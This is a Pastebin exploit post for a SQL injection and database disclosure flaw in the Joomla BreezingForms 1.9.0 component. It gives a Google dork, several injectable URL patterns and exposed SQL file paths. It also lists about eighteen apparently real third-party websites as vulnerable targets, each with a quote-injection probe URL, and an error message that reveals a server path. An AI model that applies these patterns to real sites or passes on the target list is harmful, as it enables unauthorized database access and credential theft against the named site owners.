Advertisement
KingSkrupellos

Joomla BreezingForms 1.9.0 SQL Inj DB Disclosure

Feb 9th, 2019
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.77 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla BreezingForms 1.9.0 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10/02/2019
  7. # Vendor Homepage : crosstec.org
  8. # Software Download Link : crosstec.org/en/breezingforms-lite.html
  9. crosstec.org/en/downloads/breezingforms-for-joomla.html
  10. github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_breezingforms/
  11. # Software Information Link : extensions.joomla.org/extension/breezing-forms/
  12. crosstec.org/en/downloads/breezingforms-for-joomla.html
  13. # Software Version : (build 930) - 1.9.0
  14. # Software Requirements: Joomla!® 3.x or 2.5. -- Version: 1.9.0 (build 930)
  15. # Tested On : Windows and Linux
  16. # Category : WebApps
  17. # Exploit Risk : Medium
  18. # Google Dorks : inurl:''/index.php?option=com_breezingforms''
  19. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  20. Special Elements used in an SQL Command ('SQL Injection') ]
  21. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  22. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  23. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  24.  
  25. ####################################################################
  26.  
  27. # Description about Software :
  28. ***************************
  29. BreezingForms (free) is the only free joomla forms, state of the art form
  30.  
  31. builder for Joomla!® that combines modern techniques with enterprise features.
  32.  
  33. ####################################################################
  34.  
  35. # Impact :
  36. ***********
  37. * Joomla BreezingForms 1.9.0 and other versions - component for Joomla is prone
  38.  
  39. to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  40.  
  41. data before using it in an SQL query.
  42.  
  43. Exploiting this issue could allow an attacker to compromise the application,
  44.  
  45. access or modify data, or exploit latent vulnerabilities in the underlying database.
  46.  
  47. A remote attacker can send a specially crafted request to the vulnerable application
  48.  
  49. and execute arbitrary SQL commands in application`s database.
  50.  
  51. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  52.  
  53. An attacker can exploit this issue using a browser.
  54.  
  55. * This Software prone to an information exposure/database disclosure vulnerability.
  56.  
  57. Successful exploits of this issue may allow an attacker to obtain sensitive
  58.  
  59. information by downloading the full contents of the application's database.
  60.  
  61. * Any remote user may download the database files and gain access
  62.  
  63. to sensitive information including unencrypted authentication credentials.
  64.  
  65. ####################################################################
  66.  
  67. # SQL Injection Exploit :
  68. **********************
  69. /index.php?option=com_breezingforms&view=form&Itemid=[SQL Injection]
  70.  
  71. /index.php?option=com_breezingforms&Itemid=[SQL Injection]&lang=hu
  72.  
  73. /index.php?lang=&raw=true&option=com_breezingforms&checkCaptcha=true&Itemid=[SQL Injection]
  74.  
  75. /index.php?raw=true&option=com_breezingforms&bfCaptcha=true&Itemid=[ID-NUMBER]&bfMathRandom=[SQL Injection]
  76.  
  77. /index.php?option=com_breezingforms&view=form&Itemid=[SQL Injection]&lang=de&new_lang=bg&new_lang=eng&nLang=nl
  78.  
  79. /index.php?lang=&raw=true&option=com_breezingforms&checkCaptcha=true&Itemid=[ID-NUMBER]&value=[SQL Injection]
  80.  
  81. /index.php?lang=&raw=true&option=com_breezingforms&checkCaptcha=true&Itemid=[ID-NUMBER]&tmpl=component&value=[SQL Injection]
  82.  
  83. /index.php?option=com_breezingforms&Itemid=[ID-NUMBER]&ff_form=[ID-NUMBER]&ff_applic=mod_facileforms&ff_module_id=[ID-NUMBER]&format=html&tmpl=component&ff_frame=[SQL Injection]
  84.  
  85. /index.php?option=com_breezingforms&tmpl=component&Itemid=[ID-NUMBER]&ff_contentid=[ID-NUMBER]&ff_form=[ID-NUMBER]&ff_applic=plg_facileforms&format=html&ff_frame=[SQL Injection]
  86.  
  87. # Database Disclosure Exploit :
  88. ***************************
  89. /administrator/components/com_breezingforms/sql/upgrade_1.1.sql
  90.  
  91. /administrator/components/com_breezingforms/sql/upgrade_1.2.sql
  92.  
  93. /administrator/components/com_breezingforms/sql/upgrade_1.3.sql
  94.  
  95. /administrator/components/com_breezingforms/sql/upgrade_1.4.sql
  96.  
  97. ####################################################################
  98.  
  99. # Example Vulnerable Sites :
  100. *************************
  101. [+] supremelaptopservices.com/index.php?option=com_breezingforms&Itemid=
  102. 104&ff_form=6&ff_applic=mod_facileforms&ff_module_id=172
  103. &format=html&tmpl=component&ff_frame=1%27
  104.  
  105. [+] residenciaescolarsanjose.es/index.php/index.php?lang=&raw=true&option=
  106. com_breezingforms&checkCaptcha=true&Itemid=301&value=11%27
  107.  
  108. [+] covan.es/index.php?option=com_breezingforms&view=form&Itemid=4971%27
  109.  
  110. [+] cetabol.bo/sitio/index.php?option=com_breezingforms&view=form&Itemid=3141%27
  111.  
  112. [+] antiochfellowship.co.za/index.php?option=com_breezingforms&view=form&Itemid=5471%27
  113.  
  114. [+] tomatismallorca.com/index.php?option=com_breezingforms&view=form&Itemid=5071%27
  115.  
  116. [+] philwareing.com/index.php?option=com_breezingforms&view=form&Itemid=1381%27
  117.  
  118. [+] puppylovegrooming.com/index.php?raw=true&option=com_breezingforms
  119. &bfCaptcha=true&Itemid=4&bfMathRandom=11%27
  120.  
  121. [+] bichonrescuebrigade.org/index.php?raw=true&option=com_breezingforms
  122. &bfCaptcha=true&Itemid=13&bfMathRandom=11%27
  123.  
  124. [+] igfa.gr/index.php?option=com_breezingforms&view=form&Itemid=1421%27
  125. &lang=de&new_lang=bg&new_lang=tr&nLang=nl
  126.  
  127. [+] cours-mosaique.com/index.php?lang=&raw=true&option=com_breezingforms
  128. &checkCaptcha=true&Itemid=0&tmpl=component&value=1%27
  129.  
  130. [+] marbest.es/index.php?option=com_breezingforms&view=form&Itemid=1201%27
  131.  
  132. [+] jelentkezes.mce.hu/index.php?lang=&raw=true&option=com_breezingforms
  133. &checkCaptcha=true&Itemid=0&tmpl=component&value=11%27
  134.  
  135. [+] nwsassociates.co.uk/index.php?lang=&raw=true&option=com_breezingforms
  136. &checkCaptcha=true&Itemid=108&value=11%27
  137.  
  138. [+] hertford.co.za/index.php?option=com_breezingforms&view=form&Itemid=7511%27
  139.  
  140. [+] bine-immo.de/index.php?option=com_breezingforms&tmpl=component&Itemid=2061
  141. &ff_contentid=16&ff_form=8&ff_applic=plg_facileforms&format=html&ff_frame=11%27
  142.  
  143. [+] datacat.name/index.php?option=com_breezingforms&Itemid=1091%27&lang=hu
  144.  
  145. [+] bookhamcourt.co.uk/index.php?lang=&raw=true&option=com_breezingforms
  146. &checkCaptcha=true&Itemid=0&tmpl=component&value=11%27
  147.  
  148. ####################################################################
  149.  
  150. # Example SQL Database Error :
  151. ****************************
  152. Strict Standards: Declaration of facileFormsMenus::load() should be compatible
  153. with JTable::load($keys = NULL, $reset = true) in /web/htdocs
  154. /www.covan.es/home/components/com_breezingforms/facileforms.class.php on line 364
  155.  
  156. ####################################################################
  157.  
  158. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  159.  
  160. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement